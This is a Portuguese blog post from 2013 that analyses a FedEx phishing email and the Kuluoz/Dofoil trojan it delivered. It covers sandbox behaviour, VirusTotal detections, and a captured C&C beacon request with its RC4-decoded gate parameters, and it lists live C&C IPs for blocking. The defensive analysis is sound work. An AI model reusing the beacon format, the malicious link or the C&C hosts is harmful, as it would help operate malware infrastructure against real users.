Faz algum tempo eu estava revisando meu email e sempre dou uma olhada na pasta SPAM e hoje achei alguma coisa interessante. Realmente este post saiu porque encontrei esse SPAM já que estou trabalhando em outra coisa bem interessante (próximo post).

O phishing que eu recebi foi esse:

FEDEX Phishing

Olhando o código do e-mail podemos perceber que se trata de algo malicioso:

</pre>
<font size="2">
<a href="hXXp[:]//hk-studio.net/img/info.php?label=I8UV6j3zv9BuSCW2UmCamGWfPaSlV4EauWFWplwvA9w=">
<span style="text-decoration: none; background-color: #4D148C">
<font face="Verdana" color="#FFFFFF">Print Mailing Label</font>
<pre>

Resolvi verificar o que realmente havia nesse link e para minha surpresa o nome do arquivo para fazer o download tinha o nome do país que eu estou e também o nome da cidade. Eu realmente fiquei surpreso e logo pensei que estavam utilizando geo-IP para adicionar o nome do país e da cidade para parecer um arquivo real.

Image002

Resolvi então tentar o download acessando com um proxy anônimo, e o resultando foi o esperado:

Image001

O arquivo ZIP só tem um arquivo dentro chamado “Mailing_Label_ES_CIDADE.exe”:

Screen Shot 2013-08-15 at 10.18.01 PM

Analisando o executável ( Para analizar o arquivo eu modifiquei o nome do mesmo).
Resolvi testar uma ferramenta que eu mesmo fiz para a análise de malware:

smurfx@smurfx:checkformal$ python checkformal.py -f Mailing_Label.exe
[+] File name: Mailing_Label.exe
[+] MD5: fc633eb672734020a1fc44d0ae78d264
[+] Packers info: ['Microsoft Visual C++ v6.0']
[+] Trying to catch some possible Domain/URL/IP/Email from Strings:
[!]--> No matched strings found =(. Obfuscated?!
[+] Checking VirusTotal database...
[+] Detection rate: 11 / 44
[>]McAfee : RDN/Generic.tfr!do
[>]Kaspersky : Trojan-Downloader.Win32.Dofoil.qud
[>]Emsisoft : Trojan-Downloader.Win32.Kuluoz (A)
[>]DrWeb : BackDoor.Kuluoz.4
[>]VIPRE : Trojan.Win32.Kuluoz.b (v)
[>]TrendMicro : TROJ_DOFOIL.SMJ
[>]McAfee-GW-Edition : Artemis!FC633EB67273
[>]Sophos : Mal/Weelsof-E
[>]ESET-NOD32 : a variant of Win32/Kryptik.BFSM
[>]Fortinet : W32/DOFOIL.LF!tr
[>]Panda : Suspicious file

VIRUS TOTAL RESULT – [CLIQUE AQUI]

Pode ser que se trave do virus “Win32.Kuluoz.b”, pesquisando sobre o mesmo encontrei isso no site da Microsoft: [MICROSOFT ANALYSIS]

O resultado com “exiftool” foi:

ExifTool Version Number : 9.34
File Name : Mailing_Label.exe
Directory : .
File Size : 44 kB
File Modification Date/Time : 2013:08:15 14:53:00+02:00
File Access Date/Time : 2013:08:19 22:22:02+02:00
File Creation Date/Time : 2013:08:19 22:21:58+02:00
File Permissions : rw-rw-rw-
File Type : Win32 EXE
MIME Type : application/octet-stream
Machine Type : Intel 386 or later, and compatibles
Time Stamp : 2013:08:15 21:53:42+02:00
PE Type : PE32
Linker Version : 7.10
Code Size : 8192
Initialized Data Size : 36864
Uninitialized Data Size : 0
Entry Point : 0x2706
OS Version : 4.0
Image Version : 0.0
Subsystem Version : 4.0
Subsystem : Windows GUI
File Version Number : 1.0.0.0
Product Version Number : 1.9.0.0
File Flags Mask : 0x0017
File Flags : (none)
File OS : Win32
Object File Type : Executable application
File Subtype : 0
Language Code : English (U.S.)
Character Set : Windows, Latin1
Company Name : Like
File Description : For test purpose on1y!
Original Filename : mein.exe

Com o Regshot podemos ver que ele criou um outro arquivo:

———————————-
Files added:2
———————————-
C:\Documents and Settings\Smurfx\Desktop\Mailing_Label.txt
C:\Documents and Settings\Smurfx\Local Settings\Application Data\hoawdsmm.exe

———————————-
Files deleted:1
———————————-
C:\Documents and Settings\Smurfx\Desktop\Mailing_Label.exe

Como podemos observar ele cria automaticamente um arquivo chamado “hoawdsmm.exe” e também cria um chamado “Mailing_Label.txt” e depois ele se auto apaga.

O conteúdo do arquivo TXT é esse:

RECIPIENT: Mark Smith
LOCATION OF YOUR PARCEL: Los Angeles
STATUS OF YOUR ITEM: not delivered
SERVICE: Standard Shipping
ITEM NUMBER:U2342364242354-US
INSURANCE: Yes

Comparando os md5 dos dois arquivos podemos ver que o segundo arquivo criado é exatamente uma cópia do primeiro:

MD5 (Mailing_Label.exe) = fc633eb672734020a1fc44d0ae78d264

MD5 (hoawdsmm.exe) = fc633eb672734020a1fc44d0ae78d264

Ele criou um processo com svchost.exe:

process_fedex

E verifiquei que o processo estava tentando conectar com servidores na internet:

Screen Shot 2013-08-15 at 11.54.38 PM

Podemos comprovar que o arquivo tenta conectar com vários IPs diferentes:

Screen Shot 2013-08-16 at 12.04.45 AM

Seguindo a dica do @Secluded_Memory utilizei o honeyd para conseguir mais informação sobre o que o malware está tentando acessar:

Screen Shot 2013-08-16 at 10.37.34 AM

Tudo indica que é um C&C e que conecta a seus servidores esperando um comando específico:

* Connected to 88.84.162.12 (88.84.162.12) port 587 (#0)
> GET /B69343EE237D517E73AF029EE73A73A1602509FBEE673AD30A2015424D86E9FF636EA743620D2337FFA477F73AFD0654FD7360B155D3F18D1FF47397CC1B59CED21253AC3B382C2C8F093A92 HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: 88.84.162.12:587
> Accept: */*
>
< HTTP/1.1 200 OK
* Server nginx/1.2.6 is not blacklisted
< Server: nginx/1.2.6
< Date: Fri, 16 Aug 2013 08:44:17 GMT
< Content-Type: text/html
< Content-Length: 5
< Connection: close
< X-Powered-By: PHP/5.4.4-7
< Vary: Accept-Encoding
<
* Closing connection 0
c=idl

Como podemos observar o comando é “c=idl”.

O malware se comunica com seu CnC através de mensagens cifradas com o o algoritmo RC4, se decodificamos a requisição:

GET /B69343EE237D517E73AF029EE73A73A1602509FBEE673AD30A2015424D86E9FF636EA743620D2337FFA477F73AFD0654FD7360B155D3F18D1FF47397CC1B59CED21253AC3B382C2C8F093A92

E decodificada:

/index.php?r=gate&id=B69343EE283C9EF3F33183676B2DB2A8&group=1508&debug=0

Fiz um script para testar se os IPs estão ativos ou não:

smurfx@smurfx:FedexSpam$ ./check_CC_Fedex.sh ips.txt
Checking if the IPs are still serving as c&c…
Processing the file ips.txt
46.234.101.195 OK
177.70.22.8 c&c active…
88.84.162.12 c&c active…
103.4.19.111 c&c active…
196.214.85.82 c&c active…
85.214.223.42 c&c active…
smurfx@smurfx:FedexSpam$ date
Mon Aug 19 22:14:21 CEST 2013

Conclusão:

Malwares estão cada vez mais sofisticados e cada vez mais pessoas sem conhecimentos técnicos estão caindo nessas armadilhas. Nossa obrigação é alertar e tentar proteger os usuários desse tipo de criminosos.

Você pode bloquear esse IPs em sua empresa, já que eles estão sendo utilizados como c&c servers.

Gostaria de agradecer outra vez ao @Secluded_Memory que me deu alguns conselhos por onde ir nesse caminho.

Update: Agradeço também ao @herrcore por me passar um paper da TrendMicro sobre o assunto, vale a pena conferir: WP-Asprox-Reborn.pdf

#MalwareMustDie

Happy Hunting =)